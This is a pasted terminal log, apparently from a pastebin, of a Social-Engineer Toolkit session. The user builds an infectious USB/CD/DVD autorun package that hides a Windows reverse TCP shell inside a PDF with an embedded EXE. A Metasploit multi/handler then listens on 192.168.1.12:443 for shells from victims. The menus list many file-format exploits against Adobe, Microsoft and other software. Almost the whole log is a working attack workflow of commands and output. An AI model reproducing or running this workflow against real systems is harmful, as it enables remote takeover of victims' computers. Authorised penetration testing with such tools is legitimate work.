· 6 years ago · Nov 26, 2018, 08:46 PM
1
2 Join us on irc.freenode.net in channel #setoolkit
3
4 The Social-Engineer Toolkit is a product of TrustedSec.
5
6 Visit: https://www.trustedsec.com
7
8 It's easy to update using the PenTesters Framework! (PTF)
9Visit https://github.com/trustedsec/ptf to update all your tools!
10
11
12 Select from the menu:
13
14 1) Social-Engineering Attacks
15 2) Penetration Testing (Fast-Track)
16 3) Third Party Modules
17 4) Update the Social-Engineer Toolkit
18 5) Update SET configuration
19 6) Help, Credits, and About
20
21 99) Exit the Social-Engineer Toolkit
22
23set> 1
24
25
26XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
27XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
28XX XX
29XX MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM XX
30XX MMMMMMMMMMMMMMMMMMMMMssssssssssssssssssssssssssMMMMMMMMMMMMMMMMMMMMM XX
31XX MMMMMMMMMMMMMMMMss''' '''ssMMMMMMMMMMMMMMMM XX
32XX MMMMMMMMMMMMyy'' ''yyMMMMMMMMMMMM XX
33XX MMMMMMMMyy'' ''yyMMMMMMMM XX
34XX MMMMMy'' ''yMMMMM XX
35XX MMMy' 'yMMM XX
36XX Mh' 'hM XX
37XX - - XX
38XX XX
39XX :: :: XX
40XX MMhh. ..hhhhhh.. ..hhhhhh.. .hhMM XX
41XX MMMMMh ..hhMMMMMMMMMMhh. .hhMMMMMMMMMMhh.. hMMMMM XX
42XX ---MMM .hMMMMdd:::dMMMMMMMhh.. ..hhMMMMMMMd:::ddMMMMh. MMM--- XX
43XX MMMMMM MMmm'' 'mmMMMMMMMMyy. .yyMMMMMMMMmm' ''mmMM MMMMMM XX
44XX ---mMM '' 'mmMMMMMMMM MMMMMMMMmm' '' MMm--- XX
45XX yyyym' . 'mMMMMm' 'mMMMMm' . 'myyyy XX
46XX mm'' .y' ..yyyyy.. '''' '''' ..yyyyy.. 'y. ''mm XX
47XX MN .sMMMMMMMMMss. . . .ssMMMMMMMMMs. NM XX
48XX N` MMMMMMMMMMMMMN M M NMMMMMMMMMMMMM `N XX
49XX + .sMNNNNNMMMMMN+ `N N` +NMMMMMNNNNNMs. + XX
50XX o+++ ++++Mo M M oM++++ +++o XX
51XX oo oo XX
52XX oM oo oo Mo XX
53XX oMMo M M oMMo XX
54XX +MMMM s s MMMM+ XX
55XX +MMMMM+ +++NNNN+ +NNNN+++ +MMMMM+ XX
56XX +MMMMMMM+ ++NNMMMMMMMMN+ +NMMMMMMMMNN++ +MMMMMMM+ XX
57XX MMMMMMMMMNN+++NNMMMMMMMMMMMMMMNNNNMMMMMMMMMMMMMMNN+++NNMMMMMMMMM XX
58XX yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy XX
59XX m yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy m XX
60XX MMm yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy mMM XX
61XX MMMm .yyMMMMMMMMMMMMMMMM MMMMMMMMMM MMMMMMMMMMMMMMMMyy. mMMM XX
62XX MMMMd ''''hhhhh odddo obbbo hhhh'''' dMMMM XX
63XX MMMMMd 'hMMMMMMMMMMddddddMMMMMMMMMMh' dMMMMM XX
64XX MMMMMMd 'hMMMMMMMMMMMMMMMMMMMMMMh' dMMMMMM XX
65XX MMMMMMM- ''ddMMMMMMMMMMMMMMdd'' -MMMMMMM XX
66XX MMMMMMMM '::dddddddd::' MMMMMMMM XX
67XX MMMMMMMM- -MMMMMMMM XX
68XX MMMMMMMMM MMMMMMMMM XX
69XX MMMMMMMMMy yMMMMMMMMM XX
70XX MMMMMMMMMMy. .yMMMMMMMMMM XX
71XX MMMMMMMMMMMMy. .yMMMMMMMMMMMM XX
72XX MMMMMMMMMMMMMMy. .yMMMMMMMMMMMMMM XX
73XX MMMMMMMMMMMMMMMMs. .sMMMMMMMMMMMMMMMM XX
74XX MMMMMMMMMMMMMMMMMMss. .... .ssMMMMMMMMMMMMMMMMMM XX
75XX MMMMMMMMMMMMMMMMMMMMNo oNNNNo oNMMMMMMMMMMMMMMMMMMMM XX
76XX XX
77XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
78XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
79 .o88o. o8o .
80 888 `" `"' .o8
81 o888oo .oooo.o .ooooo. .ooooo. oooo .ooooo. .o888oo oooo ooo
82 888 d88( "8 d88' `88b d88' `"Y8 `888 d88' `88b 888 `88. .8'
83 888 `"Y88b. 888 888 888 888 888ooo888 888 `88..8'
84 888 o. )88b 888 888 888 .o8 888 888 .o 888 . `888'
85 o888o 8""888P' `Y8bod8P' `Y8bod8P' o888o `Y8bod8P' "888" d8'
86 .o...P'
87 `XER0'
88
89
90[---] The Social-Engineer Toolkit (SET) [---]
91[---] Created by: David Kennedy (ReL1K) [---]
92 Version: 7.7.9
93 Codename: 'Blackout'
94[---] Follow us on Twitter: @TrustedSec [---]
95[---] Follow me on Twitter: @HackingDave [---]
96[---] Homepage: https://www.trustedsec.com [---]
97 Welcome to the Social-Engineer Toolkit (SET).
98 The one stop shop for all of your SE needs.
99
100 Join us on irc.freenode.net in channel #setoolkit
101
102 The Social-Engineer Toolkit is a product of TrustedSec.
103
104 Visit: https://www.trustedsec.com
105
106 It's easy to update using the PenTesters Framework! (PTF)
107Visit https://github.com/trustedsec/ptf to update all your tools!
108
109
110 Select from the menu:
111
112 1) Spear-Phishing Attack Vectors
113 2) Website Attack Vectors
114 3) Infectious Media Generator
115 4) Create a Payload and Listener
116 5) Mass Mailer Attack
117 6) Arduino-Based Attack Vector
118 7) Wireless Access Point Attack Vector
119 8) QRCode Generator Attack Vector
120 9) Powershell Attack Vectors
121 10) SMS Spoofing Attack Vector
122 11) Third Party Modules
123
124 99) Return back to the main menu.
125
126set> 3
127
128 The Infectious USB/CD/DVD module will create an autorun.inf file and a
129 Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
130 run if autorun is enabled.
131
132 Pick the attack vector you wish to use: fileformat bugs or a straight executable.
133
134 1) File-Format Exploits
135 2) Standard Metasploit Executable
136
137 99) Return to Main Menu
138
139set:infectious>1
140set:infectious> IP address for the reverse connection (payload):
141/usr/share/metasploit-framework/
142
143 Select the file format exploit you want.
144 The default is the PDF embedded EXE.
145
146 ********** PAYLOADS **********
147
148 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
149 2) SET Custom Written Document UNC LM SMB Capture Attack
150 3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
151 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
152 5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
153 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
154 7) Adobe Flash Player "Button" Remote Code Execution
155 8) Adobe CoolType SING Table "uniqueName" Overflow
156 9) Adobe Flash Player "newfunction" Invalid Pointer Use
157 10) Adobe Collab.collectEmailInfo Buffer Overflow
158 11) Adobe Collab.getIcon Buffer Overflow
159 12) Adobe JBIG2Decode Memory Corruption Exploit
160 13) Adobe PDF Embedded EXE Social Engineering
161 14) Adobe util.printf() Buffer Overflow
162 15) Custom EXE to VBA (sent via RAR) (RAR required)
163 16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
164 17) Adobe PDF Embedded EXE Social Engineering (NOJS)
165 18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
166 19) Apple QuickTime PICT PnSize Buffer Overflow
167 20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
168 21) Adobe Reader u3D Memory Corruption Vulnerability
169 22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
170
171set:payloads>13
172
173
174[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.
175
176 1. Use your own PDF for attack
177 2. Use built-in BLANK PDF for attack
178
179set:payloads>2
180
181 1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
182 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
183 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
184 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
185 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
186 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
187 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
188
189set:payloads>1
190set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.12]:
191set:payloads> Port to connect back on [443]:
192[-] Defaulting to port 443...
193[*] All good! The directories were created.
194[-] Generating fileformat exploit...
195[*] Waiting for payload generation to complete (be patient, takes a bit)...
196[*] Waiting for payload generation to complete (be patient, takes a bit)...
197[*] Waiting for payload generation to complete (be patient, takes a bit)...
198[*] Waiting for payload generation to complete (be patient, takes a bit)...
199[*] Waiting for payload generation to complete (be patient, takes a bit)...
200[*] Waiting for payload generation to complete (be patient, takes a bit)...
201[*] Waiting for payload generation to complete (be patient, takes a bit)...
202[*] Waiting for payload generation to complete (be patient, takes a bit)...
203[*] Payload creation complete.
204[*] All payloads get sent to the template.pdf directory
205[*] Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'
206[*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.
207[-] Copy the contents of the folder to a CD/DVD/USB to autorun
208set> Create a listener right now [yes|no]: yes
209[*] Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..
210[-] Failed to connect to the database: could not connect to server: Connection refused
211 Is the server running on host "localhost" (::1) and accepting
212 TCP/IP connections on port 5432?
213could not connect to server: Connection refused
214 Is the server running on host "localhost" (127.0.0.1) and accepting
215 TCP/IP connections on port 5432?
216
217
218 +-------------------------------------------------------+
219 | METASPLOIT by Rapid7 |
220 +---------------------------+---------------------------+
221 | __________________ | |
222 | ==c(______(o(______(_() | |""""""""""""|======[*** |
223 | )=\ | | EXPLOIT \ |
224 | // \\ | |_____________\_______ |
225 | // \\ | |==[msf >]============\ |
226 | // \\ | |______________________\ |
227 | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
228 | // \\ | ********************* |
229 +---------------------------+---------------------------+
230 | o O o | \'\/\/\/'/ |
231 | o O | )======( |
232 | o | .' LOOT '. |
233 | |^^^^^^^^^^^^^^|l___ | / _||__ \ |
234 | | PAYLOAD |""\___, | / (_||_ \ |
235 | |________________|__|)__| | | __||_) | |
236 | |(@)(@)"""**|(@)(@)**|(@) | " || " |
237 | = = = = = = = = = = = = | '--------------' |
238 +---------------------------+---------------------------+
239
240
241 =[ metasploit v4.17.3-dev ]
242+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
243+ -- --=[ 538 payloads - 41 encoders - 10 nops ]
244+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
245
246[*] Processing /root/.set/meta_config for ERB directives.
247resource (/root/.set/meta_config)> use multi/handler
248resource (/root/.set/meta_config)> set payload windows/shell_reverse_tcp
249payload => windows/shell_reverse_tcp
250resource (/root/.set/meta_config)> set lhost 192.168.1.12
251lhost => 192.168.1.12
252resource (/root/.set/meta_config)> set lport 443
253lport => 443
254resource (/root/.set/meta_config)> set ExitOnSession false
255ExitOnSession => false
256resource (/root/.set/meta_config)> exploit -j
257[*] Exploit running as background job 0.
258
259[*] Started reverse TCP handler on 192.168.1.12:443
260msf exploit(multi/handler) >